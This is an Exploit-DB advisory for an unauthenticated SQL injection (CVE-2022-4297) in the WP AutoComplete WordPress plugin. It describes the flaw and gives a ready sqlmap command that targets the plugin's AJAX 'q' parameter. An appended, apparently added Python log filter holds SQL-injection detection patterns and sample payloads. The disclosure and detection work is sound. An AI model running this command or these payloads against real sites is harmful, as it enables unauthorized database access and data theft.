
[webapps] WP AutoComplete 1.0.4 - Unauthenticated SQLi

source link: https://www.exploit-db.com/exploits/51560


EDB-ID: 51560
Platform: PHP
Date: 2023-07-03

# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
# Date: 30/06/2023
# Exploit Author: Matin nouriyan (matitanium)
# Version: <= 1.0.4
# CVE: CVE-2022-4297
# Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
# Tested on: Kali Linux

---------------------------------------


The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users,
leading to an unauthenticated SQL injection.

--------------------------------------

How to Reproduce this Vulnerability:

1. Install WP AutoComplete <= 1.0.4
2. WP AutoComplete <= 1.0.4 uses the q parameter for AJAX requests
3. Find requests that belong to WP AutoComplete, like the one in step 5
4. Start sqlmap and exploit
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
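
A defender's view of the request in step 5, as an added example that is not part of the original advisory: a Python access-log filter that flags calls to the `wi_get_search_results` action whose `q` value contains SQL syntax. The combined log format, the marker regex and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"   # endpoint from step 5
ACTION = "wi_get_search_results"         # plugin action from step 5
PARAM = "q"                              # injectable parameter per the advisory

# Assumed heuristic: SQL constructs that a search term should not contain.
SQL_SYNTAX = re.compile(
    r"union\s+(?:all\s+)?select|\bsleep\s*\(|\bbenchmark\s*\(|information_schema"
    r"|\b(?:and|or)\s+\d+\s*=\s*\d+|--\s|/\*",
    re.IGNORECASE,
)
# Assumed combined log format: ip - - [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def suspicious_requests(lines):
    """Return (client_ip, status, decoded q) for flagged calls to the plugin action."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, target, status = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if not url.path.endswith(AJAX_PATH) or ACTION not in params.get("action", []):
            continue  # some other endpoint or AJAX action
        hits += [(ip, int(status), v) for v in params.get(PARAM, []) if SQL_SYNTAX.search(v)]
    return hits

_REQ = '%s - - [03/Jul/2023:10:00:0%d +0000] "GET /wp-admin/admin-ajax.php?q=%s&Limit=1000&action=%s&security=xxxx HTTP/1.1" 200 512 "-" "-"'
# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    _REQ % ("192.0.2.10", 1, "wordpress+themes", ACTION),
    _REQ % ("192.0.2.11", 2, "o%27brien", ACTION),                       # benign apostrophe
    _REQ % ("198.51.100.7", 3, "test%27%20AND%20SLEEP%285%29--%20-", ACTION),
    _REQ % ("198.51.100.7", 4, "a%27%20AND%204821%3D4821--%20-", ACTION),
    _REQ % ("203.0.113.5", 5, "1%27%20OR%201%3D1", "other_action"),      # different action
]

if __name__ == "__main__":
    for ip, status, q in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} q={q!r}")
```

Access logs in this format record only the query string, so requests that send `q` in a POST body are not visible to this filter and need WAF or application-level logging.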
            
